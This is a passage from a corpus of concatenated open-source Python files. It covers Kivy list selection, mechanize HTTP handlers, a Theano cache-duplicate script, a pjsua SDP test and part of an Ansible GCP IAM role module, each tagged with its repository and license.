self.deselect_item_view(selected_view)
else:
self.check_for_empty_selection()
def get_view(self, index):
if index in self.cached_views:
return self.cached_views[index]
item_view = self.create_view(index)
if item_view:
self.cached_views[index] = item_view
return item_view
def create_view(self, index):
'''This method is more complicated than the one in
:class:`kivy.adapters.adapter.Adapter` and
:class:`kivy.adapters.simplelistadapter.SimpleListAdapter`, because
here we create bindings for the data item and its children back to
self.handle_selection(), and do other selection-related tasks to keep
item views in sync with the data.
'''
item = self.get_data_item(index)
if item is None:
return None
item_args = self.args_converter(index, item)
item_args['index'] = index
if self.cls:
view_instance = self.cls(**item_args)
else:
view_instance = Builder.template(self.template, **item_args)
if self.propagate_selection_to_data:
# The data item must be a subclass of SelectableDataItem, or must
# have an is_selected boolean or function, so it has is_selected
# available. If is_selected is unavailable on the data item, an
# exception is raised.
#
if isinstance(item, SelectableDataItem):
if item.is_selected:
self.handle_selection(view_instance)
elif type(item) == dict and 'is_selected' in item:
if item['is_selected']:
self.handle_selection(view_instance)
elif hasattr(item, 'is_selected'):
if (inspect.isfunction(item.is_selected)
or inspect.ismethod(item.is_selected)):
if item.is_selected():
self.handle_selection(view_instance)
else:
if item.is_selected:
self.handle_selection(view_instance)
else:
msg = "ListAdapter: unselectable data item for {0}"
raise Exception(msg.format(index))
view_instance.bind(on_release=self.handle_selection)
for child in view_instance.children:
child.bind(on_release=self.handle_selection)
return view_instance
def on_selection_change(self, *args):
'''on_selection_change() is the default handler for the
on_selection_change event.
'''
pass
def handle_selection(self, view, hold_dispatch=False, *args):
if view not in self.selection:
if self.selection_mode in ['none', 'single'] and \
len(self.selection) > 0:
for selected_view in self.selection:
self.deselect_item_view(selected_view)
if self.selection_mode != 'none':
if self.selection_mode == 'multiple':
if self.allow_empty_selection:
# If < 0, selection_limit is not active.
if self.selection_limit < 0:
self.select_item_view(view)
else:
if len(self.selection) < self.selection_limit:
self.select_item_view(view)
else:
self.select_item_view(view)
else:
self.select_item_view(view)
else:
self.deselect_item_view(view)
if self.selection_mode != 'none':
# If the deselection makes selection empty, the following call
# will check allows_empty_selection, and if False, will
# select the first item. If view happens to be the first item,
# this will be a reselection, and the user will notice no
# change, except perhaps a flicker.
#
self.check_for_empty_selection()
if not hold_dispatch:
self.dispatch('on_selection_change')
def select_data_item(self, item):
self.set_data_item_selection(item, True)
def deselect_data_item(self, item):
self.set_data_item_selection(item, False)
def set_data_item_selection(self, item, value):
if isinstance(item, SelectableDataItem):
item.is_selected = value
elif type(item) == dict:
item['is_selected'] = value
elif hasattr(item, 'is_selected'):
if (inspect.isfunction(item.is_selected)
or inspect.ismethod(item.is_selected)):
item.is_selected()
else:
item.is_selected = value
def select_item_view(self, view):
view.select()
view.is_selected = True
self.selection.append(view)
# [TODO] sibling selection for composite items
# Needed? Or handled from parent?
# (avoid circular, redundant selection)
#if hasattr(view, 'parent') and hasattr(view.parent, 'children'):
#siblings = [child for child in view.parent.children if child != view]
#for sibling in siblings:
#if hasattr(sibling, 'select'):
#sibling.select()
if self.propagate_selection_to_data:
data_item = self.get_data_item(view.index)
self.select_data_item(data_item)
def select_list(self, view_list, extend=True):
'''The select call is made for the items in the provided view_list.
Arguments:
view_list: the list of item views to become the new selection, or
to add to the existing selection
extend: boolean for whether or not to extend the existing list
'''
if not extend:
self.selection = []
for view in view_list:
self.handle_selection(view, hold_dispatch=True)
self.dispatch('on_selection_change')
def deselect_item_view(self, view):
view.deselect()
view.is_selected = False
self.selection.remove(view)
# [TODO] sibling deselection for composite items
# Needed? Or handled from parent?
# (avoid circular, redundant selection)
#if hasattr(view, 'parent') and hasattr(view.parent, 'children'):
#siblings = [child for child in view.parent.children if child != view]
#for sibling in siblings:
#if hasattr(sibling, 'deselect'):
#sibling.deselect()
if self.propagate_selection_to_data:
item = self.get_data_item(view.index)
self.deselect_data_item(item)
def deselect_list(self, l):
for view in l:
self.handle_selection(view, hold_dispatch=True)
self.dispatch('on_selection_change')
# [TODO] Could easily add select_all() and deselect_all().
def update_for_new_data(self, *args):
self.delete_cache()
self.initialize_selection()
def initialize_selection(self, *args):
if len(self.selection) > 0:
self.selection = []
self.dispatch('on_selection_change')
self.check_for_empty_selection()
def check_for_empty_selection(self, *args):
if not self.allow_empty_selection:
if len(self.selection) == 0:
# Select the first item if we have it.
v = self.get_view(0)
if v is not None:
self.handle_selection(v)
# [TODO] Also make methods for scroll_to_sel_start, scroll_to_sel_end,
# scroll_to_sel_middle.
def trim_left_of_sel(self, *args):
'''Cut list items with indices in sorted_keys that are less than the
index of the first selected item if there is a selection.
'''
if len(self.selection) > 0:
first_sel_index = min([sel.index for sel in self.selection])
self.data = self.data[first_sel_index:]
def trim_right_of_sel(self, *args):
'''Cut list items with indices in sorted_keys that are greater than
the index of the last selected item if there is a selection.
'''
if len(self.selection) > 0:
last_sel_index = max([sel.index for sel in self.selection])
print('last_sel_index', last_sel_index)
self.data = self.data[:last_sel_index + 1]
def trim_to_sel(self, *args):
'''Cut list items with indices in sorted_keys that are les than or
greater than the index of the last selected item if there is a
selection. This preserves intervening list items within the selected
range.
'''
if len(self.selection) > 0:
sel_indices = [sel.index for sel in self.selection]
first_sel_index = min(sel_indices)
last_sel_index = max(sel_indices)
self.data = self.data[first_sel_index:last_sel_index + 1]
def cut_to_sel(self, *args):
'''Same as trim_to_sel, but intervening list items within the selected
range are also cut, leaving only list items that are selected.
'''
if len(self.selection) > 0:
self.data = self.selection
| JulienMcJay/eclock | windows/kivy/kivy/adapters/listadapter.py | Python | gpl-2.0 | 17,276 |
"""HTTP related handlers.
Note that some other HTTP handlers live in more specific modules: _auth.py,
_gzip.py, etc.
Copyright 2002-2006 John J Lee <jjl@pobox.com>
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD or ZPL 2.1 licenses (see the file
COPYING.txt included with the distribution).
"""
import time, htmlentitydefs, logging, \
fakesocket, urllib2, urllib, httplib, sgmllib
from urllib2 import URLError, HTTPError, BaseHandler
from cStringIO import StringIO
from _clientcookie import CookieJar
from _headersutil import is_html
from _html import unescape, unescape_charref
from _request import Request
from _response import closeable_response, response_seek_wrapper
import _rfc3986
import _sockettimeout
debug = logging.getLogger("mechanize").debug
debug_robots = logging.getLogger("mechanize.robots").debug
# monkeypatch urllib2.HTTPError to show URL
## def urllib2_str(self):
## return 'HTTP Error %s: %s (%s)' % (
## self.code, self.msg, self.geturl())
## urllib2.HTTPError.__str__ = urllib2_str
CHUNK = 1024 # size of chunks fed to HTML HEAD parser, in bytes
DEFAULT_ENCODING = 'latin-1'
#try:
# socket._fileobject("fake socket", close=True)
#except TypeError:
# python <= 2.4
# create_readline_wrapper = socket._fileobject
#else:
def create_readline_wrapper(fh):
return fakesocket._fileobject(fh, close=True)
# This adds "refresh" to the list of redirectables and provides a redirection
# algorithm that doesn't go into a loop in the presence of cookies
# (Python 2.4 has this new algorithm, 2.3 doesn't).
class HTTPRedirectHandler(BaseHandler):
# maximum number of redirections to any single URL
# this is needed because of the state that cookies introduce
max_repeats = 4
# maximum total number of redirections (regardless of URL) before
# assuming we're in a loop
max_redirections = 10
# Implementation notes:
# To avoid the server sending us into an infinite loop, the request
# object needs to track what URLs we have already seen. Do this by
# adding a handler-specific attribute to the Request object. The value
# of the dict is used to count the number of times the same URL has
# been visited. This is needed because visiting the same URL twice
# does not necessarily imply a loop, thanks to state introduced by
# cookies.
# Always unhandled redirection codes:
# 300 Multiple Choices: should not handle this here.
# 304 Not Modified: no need to handle here: only of interest to caches
# that do conditional GETs
# 305 Use Proxy: probably not worth dealing with here
# 306 Unused: what was this for in the previous versions of protocol??
def redirect_request(self, newurl, req, fp, code, msg, headers):
"""Return a Request or None in response to a redirect.
This is called by the http_error_30x methods when a redirection
response is received. If a redirection should take place, return a
new Request to allow http_error_30x to perform the redirect;
otherwise, return None to indicate that an HTTPError should be
raised.
"""
if code in (301, 302, 303, "refresh") or \
(code == 307 and not req.has_data()):
# Strictly (according to RFC 2616), 301 or 302 in response to
# a POST MUST NOT cause a redirection without confirmation
# from the user (of urllib2, in this case). In practice,
# essentially all clients do redirect in this case, so we do
# the same.
# XXX really refresh redirections should be visiting; tricky to
# fix, so this will wait until post-stable release
new = Request(newurl,
headers=req.headers,
origin_req_host=req.get_origin_req_host(),
unverifiable=True,
visit=False,
)
new._origin_req = getattr(req, "_origin_req", req)
return new
else:
raise HTTPError(req.get_full_url(), code, msg, headers, fp)
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
if headers.has_key('location'):
newurl = headers.getheaders('location')[0]
elif headers.has_key('uri'):
newurl = headers.getheaders('uri')[0]
else:
return
newurl = _rfc3986.clean_url(newurl, "latin-1")
newurl = _rfc3986.urljoin(req.get_full_url(), newurl)
# XXX Probably want to forget about the state of the current
# request, although that might interact poorly with other
# handlers that also use handler-specific request attributes
new = self.redirect_request(newurl, req, fp, code, msg, headers)
if new is None:
return
# loop detection
# .redirect_dict has a key url if url was previously visited.
if hasattr(req, 'redirect_dict'):
visited = new.redirect_dict = req.redirect_dict
if (visited.get(newurl, 0) >= self.max_repeats or
len(visited) >= self.max_redirections):
raise HTTPError(req.get_full_url(), code,
self.inf_msg + msg, headers, fp)
else:
visited = new.redirect_dict = req.redirect_dict = {}
visited[newurl] = visited.get(newurl, 0) + 1
# Don't close the fp until we are sure that we won't use it
# with HTTPError.
fp.read()
fp.close()
return self.parent.open(new)
http_error_301 = http_error_303 = http_error_307 = http_error_302
http_error_refresh = http_error_302
inf_msg = "The HTTP server returned a redirect error that would " \
"lead to an infinite loop.\n" \
"The last 30x error message was:\n"
# XXX would self.reset() work, instead of raising this exception?
class EndOfHeadError(Exception): pass
class AbstractHeadParser:
# only these elements are allowed in or before HEAD of document
head_elems = ("html", "head",
"title", "base",
"script", "style", "meta", "link", "object")
_entitydefs = htmlentitydefs.name2codepoint
_encoding = DEFAULT_ENCODING
def __init__(self):
self.http_equiv = []
def start_meta(self, attrs):
http_equiv = content = None
for key, value in attrs:
if key == "http-equiv":
http_equiv = self.unescape_attr_if_required(value)
elif key == "content":
content = self.unescape_attr_if_required(value)
if http_equiv is not None and content is not None:
self.http_equiv.append((http_equiv, content))
def end_head(self):
raise EndOfHeadError()
def handle_entityref(self, name):
#debug("%s", name)
self.handle_data(unescape(
'&%s;' % name, self._entitydefs, self._encoding))
def handle_charref(self, name):
#debug("%s", name)
self.handle_data(unescape_charref(name, self._encoding))
def unescape_attr(self, name):
#debug("%s", name)
return unescape(name, self._entitydefs, self._encoding)
def unescape_attrs(self, attrs):
#debug("%s", attrs)
escaped_attrs = {}
for key, val in attrs.items():
escaped_attrs[key] = self.unescape_attr(val)
return escaped_attrs
def unknown_entityref(self, ref):
self.handle_data("&%s;" % ref)
def unknown_charref(self, ref):
self.handle_data("&#%s;" % ref)
try:
import HTMLParser
except ImportError:
pass
else:
class XHTMLCompatibleHeadParser(AbstractHeadParser,
HTMLParser.HTMLParser):
def __init__(self):
HTMLParser.HTMLParser.__init__(self)
AbstractHeadParser.__init__(self)
def handle_starttag(self, tag, attrs):
if tag not in self.head_elems:
raise EndOfHeadError()
try:
method = getattr(self, 'start_' + tag)
except AttributeError:
try:
method = getattr(self, 'do_' + tag)
except AttributeError:
pass # unknown tag
else:
method(attrs)
else:
method(attrs)
def handle_endtag(self, tag):
if tag not in self.head_elems:
raise EndOfHeadError()
try:
method = getattr(self, 'end_' + tag)
except AttributeError:
pass # unknown tag
else:
method()
def unescape(self, name):
# Use the entitydefs passed into constructor, not
# HTMLParser.HTMLParser's entitydefs.
return self.unescape_attr(name)
def unescape_attr_if_required(self, name):
return name # HTMLParser.HTMLParser already did it
class HeadParser(AbstractHeadParser, sgmllib.SGMLParser):
def _not_called(self):
assert False
def __init__(self):
sgmllib.SGMLParser.__init__(self)
AbstractHeadParser.__init__(self)
def handle_starttag(self, tag, method, attrs):
if tag not in self.head_elems:
raise EndOfHeadError()
if tag == "meta":
method(attrs)
def unknown_starttag(self, tag, attrs):
self.handle_starttag(tag, self._not_called, attrs)
def handle_endtag(self, tag, method):
if tag in self.head_elems:
method()
else:
raise EndOfHeadError()
def unescape_attr_if_required(self, name):
return self.unescape_attr(name)
def parse_head(fileobj, parser):
"""Return a list of key, value pairs."""
while 1:
data = fileobj.read(CHUNK)
try:
parser.feed(data)
except EndOfHeadError:
break
if len(data) != CHUNK:
# this should only happen if there is no HTML body, or if
# CHUNK is big
break
return parser.http_equiv
class HTTPEquivProcessor(BaseHandler):
"""Append META HTTP-EQUIV headers to regular HTTP headers."""
handler_order = 300 # before handlers that look at HTTP headers
def __init__(self, head_parser_class=HeadParser,
i_want_broken_xhtml_support=False,
):
self.head_parser_class = head_parser_class
self._allow_xhtml = i_want_broken_xhtml_support
def http_response(self, request, response):
if not hasattr(response, "seek"):
response = response_seek_wrapper(response)
http_message = response.info()
url = response.geturl()
ct_hdrs = http_message.getheaders("content-type")
if is_html(ct_hdrs, url, self._allow_xhtml):
try:
try:
html_headers = parse_head(response,
self.head_parser_class())
finally:
response.seek(0)
except (HTMLParser.HTMLParseError,
sgmllib.SGMLParseError):
pass
else:
for hdr, val in html_headers:
# add a header
http_message.dict[hdr.lower()] = val
text = hdr + ": " + val
for line in text.split("\n"):
http_message.headers.append(line + "\n")
return response
https_response = http_response
class HTTPCookieProcessor(BaseHandler):
"""Handle HTTP cookies.
Public attributes:
cookiejar: CookieJar instance
"""
def __init__(self, cookiejar=None):
if cookiejar is None:
cookiejar = CookieJar()
self.cookiejar = cookiejar
def http_request(self, request):
self.cookiejar.add_cookie_header(request)
return request
def http_response(self, request, response):
self.cookiejar.extract_cookies(response, request)
return response
https_request = http_request
https_response = http_response
try:
import robotparser
except ImportError:
pass
else:
class MechanizeRobotFileParser(robotparser.RobotFileParser):
def __init__(self, url='', opener=None):
robotparser.RobotFileParser.__init__(self, url)
self._opener = opener
self._timeout = _sockettimeout._GLOBAL_DEFAULT_TIMEOUT
def set_opener(self, opener=None):
import _opener
if opener is None:
opener = _opener.OpenerDirector()
self._opener = opener
def set_timeout(self, timeout):
self._timeout = timeout
def read(self):
"""Reads the robots.txt URL and feeds it to the parser."""
if self._opener is None:
self.set_opener()
req = Request(self.url, unverifiable=True, visit=False,
timeout=self._timeout)
try:
f = self._opener.open(req)
except HTTPError, f:
pass
#except (IOError, socket.error, OSError), exc:
except (IOError, OSError), exc:
debug_robots("ignoring error opening %r: %s" %
(self.url, exc))
return
lines = []
line = f.readline()
while line:
lines.append(line.strip())
line = f.readline()
status = f.code
if status == 401 or status == 403:
self.disallow_all = True
debug_robots("disallow all")
elif status >= 400:
self.allow_all = True
debug_robots("allow all")
elif status == 200 and lines:
debug_robots("parse lines")
self.parse(lines)
class RobotExclusionError(urllib2.HTTPError):
def __init__(self, request, *args):
apply(urllib2.HTTPError.__init__, (self,)+args)
self.request = request
class HTTPRobotRulesProcessor(BaseHandler):
# before redirections, after everything else
handler_order = 800
try:
from httplib import HTTPMessage
except:
from mimetools import Message
http_response_class = Message
else:
http_response_class = HTTPMessage
def __init__(self, rfp_class=MechanizeRobotFileParser):
self.rfp_class = rfp_class
self.rfp = None
self._host = None
def http_request(self, request):
scheme = request.get_type()
if scheme not in ["http", "https"]:
# robots exclusion only applies to HTTP
return request
if request.get_selector() == "/robots.txt":
# /robots.txt is always OK to fetch
return request
host = request.get_host()
# robots.txt requests don't need to be allowed by robots.txt :-)
origin_req = getattr(request, "_origin_req", None)
if (origin_req is not None and
origin_req.get_selector() == "/robots.txt" and
origin_req.get_host() == host
):
return request
if host != self._host:
self.rfp = self.rfp_class()
try:
self.rfp.set_opener(self.parent)
except AttributeError:
debug("%r instance does not support set_opener" %
self.rfp.__class__)
self.rfp.set_url(scheme+"://"+host+"/robots.txt")
self.rfp.set_timeout(request.timeout)
self.rfp.read()
self._host = host
ua = request.get_header("User-agent", "")
if self.rfp.can_fetch(ua, request.get_full_url()):
return request
else:
# XXX This should really have raised URLError. Too late now...
msg = "request disallowed by robots.txt"
raise RobotExclusionError(
request,
request.get_full_url(),
403, msg,
self.http_response_class(StringIO()), StringIO(msg))
https_request = http_request
class HTTPRefererProcessor(BaseHandler):
"""Add Referer header to requests.
This only makes sense if you use each RefererProcessor for a single
chain of requests only (so, for example, if you use a single
HTTPRefererProcessor to fetch a series of URLs extracted from a single
page, this will break).
There's a proper implementation of this in mechanize.Browser.
"""
def __init__(self):
self.referer = None
def http_request(self, request):
if ((self.referer is not None) and
not request.has_header("Referer")):
request.add_unredirected_header("Referer", self.referer)
return request
def http_response(self, request, response):
self.referer = response.geturl()
return response
https_request = http_request
https_response = http_response
def clean_refresh_url(url):
# e.g. Firefox 1.5 does (something like) this
if ((url.startswith('"') and url.endswith('"')) or
(url.startswith("'") and url.endswith("'"))):
url = url[1:-1]
return _rfc3986.clean_url(url, "latin-1") # XXX encoding
def parse_refresh_header(refresh):
"""
>>> parse_refresh_header("1; url=http://example.com/")
(1.0, 'http://example.com/')
>>> parse_refresh_header("1; url='http://example.com/'")
(1.0, 'http://example.com/')
>>> parse_refresh_header("1")
(1.0, None)
>>> parse_refresh_header("blah")
Traceback (most recent call last):
ValueError: invalid literal for float(): blah
"""
ii = refresh.find(";")
if ii != -1:
pause, newurl_spec = float(refresh[:ii]), refresh[ii+1:]
jj = newurl_spec.find("=")
key = None
if jj != -1:
key, newurl = newurl_spec[:jj], newurl_spec[jj+1:]
newurl = clean_refresh_url(newurl)
if key is None or key.strip().lower() != "url":
raise ValueError()
else:
pause, newurl = float(refresh), None
return pause, newurl
class HTTPRefreshProcessor(BaseHandler):
"""Perform HTTP Refresh redirections.
Note that if a non-200 HTTP code has occurred (for example, a 30x
redirect), this processor will do nothing.
By default, only zero-time Refresh headers are redirected. Use the
max_time attribute / constructor argument to allow Refresh with longer
pauses. Use the honor_time attribute / constructor argument to control
whether the requested pause is honoured (with a time.sleep()) or
skipped in favour of immediate redirection.
Public attributes:
max_time: see above
honor_time: see above
"""
handler_order = 1000
def __init__(self, max_time=0, honor_time=True):
self.max_time = max_time
self.honor_time = honor_time
self._sleep = time.sleep
def http_response(self, request, response):
code, msg, hdrs = response.code, response.msg, response.info()
if code == 200 and hdrs.has_key("refresh"):
refresh = hdrs.getheaders("refresh")[0]
try:
pause, newurl = parse_refresh_header(refresh)
except ValueError:
debug("bad Refresh header: %r" % refresh)
return response
if newurl is None:
newurl = response.geturl()
if (self.max_time is None) or (pause <= self.max_time):
if pause > 1E-3 and self.honor_time:
self._sleep(pause)
hdrs["location"] = newurl
# hardcoded http is NOT a bug
response = self.parent.error(
"http", request, response,
"refresh", msg, hdrs)
else:
debug("Refresh header ignored: %r" % refresh)
return response
https_response = http_response
class HTTPErrorProcessor(BaseHandler):
"""Process HTTP error responses.
The purpose of this handler is to to allow other response processors a
look-in by removing the call to parent.error() from
AbstractHTTPHandler.
For non-200 error codes, this just passes the job on to the
Handler.<proto>_error_<code> methods, via the OpenerDirector.error
method. Eventually, urllib2.HTTPDefaultErrorHandler will raise an
HTTPError if no other handler handles the error.
"""
handler_order = 1000 # after all other processors
def http_response(self, request, response):
code, msg, hdrs = response.code, response.msg, response.info()
if code != 200:
# hardcoded http is NOT a bug
response = self.parent.error(
"http", request, response, code, msg, hdrs)
return response
https_response = http_response
class HTTPDefaultErrorHandler(BaseHandler):
def http_error_default(self, req, fp, code, msg, hdrs):
# why these error methods took the code, msg, headers args in the first
# place rather than a response object, I don't know, but to avoid
# multiple wrapping, we're discarding them
if isinstance(fp, urllib2.HTTPError):
response = fp
else:
response = urllib2.HTTPError(
req.get_full_url(), code, msg, hdrs, fp)
assert code == response.code
assert msg == response.msg
assert hdrs == response.hdrs
raise response
class AbstractHTTPHandler(BaseHandler):
def __init__(self, debuglevel=0):
self._debuglevel = debuglevel
def set_http_debuglevel(self, level):
self._debuglevel = level
def do_request_(self, request):
host = request.get_host()
if not host:
raise URLError('no host given')
if request.has_data(): # POST
data = request.get_data()
if not request.has_header('Content-type'):
request.add_unredirected_header(
'Content-type',
'application/x-www-form-urlencoded')
if not request.has_header('Content-length'):
request.add_unredirected_header(
'Content-length', '%d' % len(data))
scheme, sel = urllib.splittype(request.get_selector())
sel_host, sel_path = urllib.splithost(sel)
if not request.has_header('Host'):
request.add_unredirected_header('Host', sel_host or host)
for name, value in self.parent.addheaders:
name = name.capitalize()
if not request.has_header(name):
request.add_unredirected_header(name, value)
return request
def do_open(self, http_class, req):
"""Return an addinfourl object for the request, using http_class.
http_class must implement the HTTPConnection API from httplib.
The addinfourl return value is a file-like object. It also
has methods and attributes including:
- info(): return a mimetools.Message object for the headers
- geturl(): return the original request URL
- code: HTTP status code
"""
host_port = req.get_host()
if not host_port:
raise URLError('no host given')
try:
h = http_class(host_port, timeout=req.timeout)
except TypeError:
# Python < 2.6, no per-connection timeout support
h = http_class(host_port)
h.set_debuglevel(self._debuglevel)
headers = dict(req.headers)
headers.update(req.unredirected_hdrs)
# We want to make an HTTP/1.1 request, but the addinfourl
# class isn't prepared to deal with a persistent connection.
# It will try to read all remaining data from the socket,
# which will block while the server waits for the next request.
# So make sure the connection gets closed after the (only)
# request.
headers["Connection"] = "close"
headers = dict(
[(name.title(), val) for name, val in headers.items()])
try:
h.request(req.get_method(), req.get_selector(), req.data, headers)
r = h.getresponse()
#except socket.error, err: # XXX what error?
except (Exception), err: # XXX what error?
raise URLError(err)
# Pick apart the HTTPResponse object to get the addinfourl
# object initialized properly.
# Wrap the HTTPResponse object in socket's file object adapter
# for Windows. That adapter calls recv(), so delegate recv()
# to read(). This weird wrapping allows the returned object to
# have readline() and readlines() methods.
# XXX It might be better to extract the read buffering code
# out of socket._fileobject() and into a base class.
r.recv = r.read
fp = create_readline_wrapper(r)
resp = closeable_response(fp, r.msg, req.get_full_url(),
r.status, r.reason)
return resp
class HTTPHandler(AbstractHTTPHandler):
def http_open(self, req):
return self.do_open(httplib.HTTPConnection, req)
http_request = AbstractHTTPHandler.do_request_
if hasattr(httplib, 'HTTPS'):
class HTTPSConnectionFactory:
def __init__(self, key_file, cert_file):
self._key_file = key_file
self._cert_file = cert_file
def __call__(self, hostport):
return httplib.HTTPSConnection(
hostport,
key_file=self._key_file, cert_file=self._cert_file)
class HTTPSHandler(AbstractHTTPHandler):
def __init__(self, client_cert_manager=None):
AbstractHTTPHandler.__init__(self)
self.client_cert_manager = client_cert_manager
def https_open(self, req):
if self.client_cert_manager is not None:
key_file, cert_file = self.client_cert_manager.find_key_cert(
req.get_full_url())
conn_factory = HTTPSConnectionFactory(key_file, cert_file)
else:
conn_factory = httplib.HTTPSConnection
return self.do_open(conn_factory, req)
https_request = AbstractHTTPHandler.do_request_
| Andrew-Dickinson/FantasyFRC | customMechanize/_googleappengine.py | Python | gpl-2.0 | 26,831 |
from __future__ import print_function
import six.moves.cPickle as pickle
import os
import sys
import theano
from six import iteritems, itervalues
DISPLAY_DUPLICATE_KEYS = False
DISPLAY_MOST_FREQUENT_DUPLICATE_CCODE = False
dirs = []
if len(sys.argv) > 1:
for compiledir in sys.argv[1:]:
dirs.extend([os.path.join(compiledir, d) for d in os.listdir(compiledir)])
else:
dirs = os.listdir(theano.config.compiledir)
dirs = [os.path.join(theano.config.compiledir, d) for d in dirs]
keys = {} # key -> nb seen
mods = {}
for dir in dirs:
key = None
try:
f = open(os.path.join(dir, "key.pkl"))
key = f.read()
f.close()
keys.setdefault(key, 0)
keys[key] += 1
del f
except IOError:
# print dir, "don't have a key.pkl file"
pass
try:
path = os.path.join(dir, "mod.cpp")
if not os.path.exists(path):
path = os.path.join(dir, "mod.cu")
f = open(path)
mod = f.read()
f.close()
mods.setdefault(mod, ())
mods[mod] += (key,)
del mod
del f
del path
except IOError:
print(dir, "don't have a mod.{cpp,cu} file")
pass
if DISPLAY_DUPLICATE_KEYS:
for k, v in iteritems(keys):
if v > 1:
print("Duplicate key (%i copies): %s" % (v, pickle.loads(k)))
nbs_keys = {} # nb seen -> now many key
for val in itervalues(keys):
nbs_keys.setdefault(val, 0)
nbs_keys[val] += 1
nbs_mod = {} # nb seen -> how many key
nbs_mod_to_key = {} # nb seen -> keys
more_than_one = 0
for mod, kk in iteritems(mods):
val = len(kk)
nbs_mod.setdefault(val, 0)
nbs_mod[val] += 1
if val > 1:
more_than_one += 1
nbs_mod_to_key[val] = kk
if DISPLAY_MOST_FREQUENT_DUPLICATE_CCODE:
m = max(nbs_mod.keys())
print("The keys associated to the mod.{cpp,cu} with the most number of copy:")
for kk in nbs_mod_to_key[m]:
kk = pickle.loads(kk)
print(kk)
print("key.pkl histograph")
l = list(nbs_keys.items())
l.sort()
print(l)
print("mod.{cpp,cu} histogram")
l = list(nbs_mod.items())
l.sort()
print(l)
total = sum(len(k) for k in list(mods.values()))
uniq = len(mods)
useless = total - uniq
print("mod.{cpp,cu} total:", total)
print("mod.{cpp,cu} uniq:", uniq)
print("mod.{cpp,cu} with more than 1 copy:", more_than_one)
print("mod.{cpp,cu} useless:", useless, float(useless) / total * 100, "%")
print("nb directory", len(dirs))
| valexandersaulys/airbnb_kaggle_contest | venv/lib/python3.4/site-packages/Theano-0.7.0-py3.4.egg/theano/misc/check_duplicate_key.py | Python | gpl-2.0 | 2,482 |
# $Id: 126_sdp_with_port_0_and_no_rtpmap_for_dynamic_pt.py 369517 2012-07-01 17:28:57Z file $
import inc_sip as sip
import inc_sdp as sdp
sdp = \
"""
v=0
o=- 0 0 IN IP4 127.0.0.1
s=-
c=IN IP4 127.0.0.1
t=0 0
m=video 0 RTP/AVP 100
m=audio 5000 RTP/AVP 0
"""
pjsua_args = "--null-audio --auto-answer 200"
extra_headers = ""
include = ["Content-Type: application/sdp", # response must include SDP
"m=video 0 RTP/AVP[\\s\\S]+m=audio [1-9]+[0-9]* RTP/AVP"
]
exclude = []
sendto_cfg = sip.SendtoCfg("SDP media with port 0 and no rtpmap for dynamic PT", pjsua_args, sdp, 200,
extra_headers=extra_headers,
resp_inc=include, resp_exc=exclude)
| fluentstream/asterisk-p2p | res/pjproject/tests/pjsua/scripts-sendto/126_sdp_with_port_0_and_no_rtpmap_for_dynamic_pt.py | Python | gpl-2.0 | 659 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_iam_role
description:
- A role in the Identity and Access Management API .
short_description: Creates a GCP Role
version_added: 2.8
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
state:
description:
- Whether the given object should exist in GCP
choices:
- present
- absent
default: present
name:
description:
- The name of the role.
required: true
title:
description:
- A human-readable title for the role. Typically this is limited to 100 UTF-8
bytes.
required: false
description:
description:
- Human-readable description for the role.
required: false
included_permissions:
description:
- Names of permissions this role grants when bound in an IAM policy.
required: false
stage:
description:
- The current launch stage of the role.
- 'Some valid choices include: "ALPHA", "BETA", "GA", "DEPRECATED", "DISABLED",
"EAP"'
required: false
extends_documentation_fragment: gcp
'''
EXAMPLES = '''
- name: create a role
gcp_iam_role:
name: myCustomRole2
title: My Custom Role
description: My custom role description
included_permissions:
- iam.roles.list
- iam.roles.create
- iam.roles.delete
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
state: present
'''
RETURN = '''
name:
description:
- The name of the role.
returned: success
type: str
title:
description:
- A human-readable title for the role. Typically this is limited to 100 UTF-8 bytes.
returned: success
type: str
description:
description:
- Human-readable description for the role.
returned: success
type: str
includedPermissions:
description:
- Names of permissions this role grants when bound in an IAM policy.
returned: success
type: list
stage:
description:
- The current launch stage of the role.
returned: success
type: str
deleted:
description:
- The current deleted state of the role.
returned: success
type: bool
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, replace_resource_dict
import json
################################################################################
# Main
################################################################################
def main():
"""Main function"""
module = GcpModule(
argument_spec=dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
name=dict(required=True, type='str'),
title=dict(type='str'),
description=dict(type='str'),
included_permissions=dict(type='list', elements='str'),
stage=dict(type='str'),
)
)
if not module.params['scopes']:
module.params['scopes'] = ['https://www.googleapis.com/auth/iam']
state = module.params['state']
fetch = fetch_resource(module, self_link(module))
changed = False
if fetch:
if state == 'present':
if is_different(module, fetch):
update(module, self_link(module), fetch)
fetch = fetch_resource(module, self_link(module))
changed = True
else:
delete(module, self_link(module))
fetch = {}
changed = True
else:
if state == 'present':
fetch = create(module, collection(module))
changed = True
else:
fetch = {}
fetch.update({'changed': changed})
module.exit_json(**fetch)
def create(module, link):
auth = GcpSession(module, 'iam')
return return_if_object(module, auth.post(link, resource_to_create(module)))
def update(module, link, fetch):
auth = GcpSession(module, 'iam')
params = {'updateMask': updateMask(resource_to_request(module), response_to_hash(module, fetch))}
request = resource_to_request(module)
del request['name']
return return_if_object(module, auth.put(link, request, params=params))
def updateMask(request, response):
update_mask = []
if request.get('name') != response.get('name'):
update_mask.append('name')
if request.get('title') != response.get('title'):
update_mask.append('title')
if request.get('description') != response.get('description'):
update_mask.append('description')
if request.get('includedPermissions') != response.get('includedPermissions'):
